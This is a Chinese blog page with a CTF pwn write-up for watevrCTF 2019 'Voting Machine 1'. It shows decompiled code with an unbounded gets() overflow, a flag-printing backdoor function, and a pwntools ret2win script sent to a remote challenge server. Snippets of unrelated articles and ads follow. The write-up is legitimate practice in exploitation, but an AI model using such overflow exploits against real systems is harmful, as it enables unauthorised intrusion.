news 2026/4/23 6:24:18

[watevrCTF 2019]Voting Machine 1

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
[watevrCTF 2019]Voting Machine 1

第一次打CTF——PWN篇学习笔记12

int __fastcall main(int argc, const char **argv, const char **envp) { _BYTE v4[2]; // [rsp+Eh] [rbp-2h] BYREF ​ signal(14, sig); alarm(0x28u); puts("Hello and welcome to \x1B[3mour\x1B[23m voting application!"); puts("Today's vote will be regarding the administration of"); puts("watevr CTF."); puts("the voting range is 0 to 10. 0 being the worst possible and 10 being the best possible."); puts("Thanks!"); printf("Vote: "); fflush(_bss_start); gets(v4); puts("Thanks for voting!"); return 0; }

发现gets函数,明显的栈溢出,查看字符串发现/home/ctf/flag.txt,点击进入后门函数

void __noreturn super_secret_function() { FILE *stream; // [rsp+0h] [rbp-10h] char i; // [rsp+Fh] [rbp-1h] ​ stream = fopen("/home/ctf/flag.txt", "r"); if ( !stream ) { puts("Cannot open flag.txt"); exit(1); } for ( i = fgetc(stream); i != -1; i = fgetc(stream) ) putchar(i); fclose(stream); exit(0); }
.text:0000000000400807 super_secret_function proc near .text:0000000000400807 .text:0000000000400807 stream = qword ptr -10h .text:0000000000400807 var_1 = byte ptr -1 .text:0000000000400807 .text:0000000000400807 ; __unwind { .text:0000000000400807 push rbp .text:0000000000400808 mov rbp, rsp .text:000000000040080B sub rsp, 10h .text:000000000040080F lea rsi, modes ; "r" .text:0000000000400816 lea rdi, filename ; "/home/ctf/flag.txt" .text:000000000040081D call _fopen .text:0000000000400822 mov [rbp+stream], rax .text:0000000000400826 cmp [rbp+stream], 0 .text:000000000040082B jnz short loc_400843 .text:000000000040082D lea rdi, s ; "Cannot open flag.txt" .text:0000000000400834 call _puts .text:0000000000400839 mov edi, 1 ; status .text:000000000040083E call _exit

取地址0x400808,据此编写脚本,成功获得flag

from pwn import * import struct ​ context.arch = 'amd64' context.os = 'linux' ​ #io = process('./pwn') io = remote("node5.anna.nssctf.cn",21930) ​ backdoor = 0x400808 ​ payload = cyclic(0x2 + 8) + p64(backdoor) ​ io.sendline(payload) ​ io.interactive()
版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/4/11 16:54:47

Java毕设选题推荐:基于Springboot+Vue的古风生活文化分享体验交流网站基于springboot古风生活体验交流网站的设计与实现【附源码、mysql、文档、调试+代码讲解+全bao等】

博主介绍:✌️码农一枚 ,专注于大学生项目实战开发、讲解和毕业🚢文撰写修改等。全栈领域优质创作者,博客之星、掘金/华为云/阿里云/InfoQ等平台优质作者、专注于Java、小程序技术领域和毕业项目实战 ✌️技术范围:&am…

作者头像 李华
网站建设 2026/4/22 18:40:28

SQLPad查询缓存配置完全指南:如何让重复查询速度提升10倍

SQLPad查询缓存配置完全指南:如何让重复查询速度提升10倍 【免费下载链接】sqlpad Web-based SQL editor. Legacy project in maintenance mode. 项目地址: https://gitcode.com/gh_mirrors/sq/sqlpad 还在为每次执行相同SQL查询都要等待几秒钟而烦恼吗&…

作者头像 李华
网站建设 2026/4/17 23:15:10

10 个本科生论文写作工具,AI 工具推荐与对比

10 个本科生论文写作工具,AI 工具推荐与对比 论文写作的“三座大山”:时间、重复率与自我折磨 对于大多数本科生来说,论文写作从来不是一件轻松的事。从选题到文献综述,再到最终的成文和降重,每一个环节都像是一场持久…

作者头像 李华
网站建设 2026/4/20 16:45:16

10个课堂汇报神器!本科生AI工具推荐与对比分析

10个课堂汇报神器!本科生AI工具推荐与对比分析 论文写到崩溃?你的课堂汇报真的需要一个“AI助手” 对于本科生来说,课堂汇报、文献综述、毕业论文这些任务就像是一道道“拦路虎”,让人既紧张又焦虑。尤其是当多个任务同时袭来时&a…

作者头像 李华
网站建设 2026/4/22 19:57:41

Ensp下载官网提供哪些可用于AI网络测试的功能模块

Qwen3-VL-8B:轻量多模态模型如何重塑AI网络测试实践 在智能客服系统频繁因图片识别延迟而卡顿、电商平台的自动审核流程因视觉模型响应过慢导致积压的今天,一个现实问题摆在开发者面前:我们能否在不依赖昂贵GPU集群的前提下,构建一…

作者头像 李华
网站建设 2026/4/19 20:31:18

百度文库发布Qwen-Image-Edit-2509教学PPT下载

Qwen-Image-Edit-2509:让图像编辑“听懂人话”的技术实践 在电商运营的深夜,设计师还在为上百款服装更换背景颜色而加班;社交媒体团队为了发布多语言版本海报,反复调整文字排版与文化适配元素;内容创作者面对客户“稍微…

作者头像 李华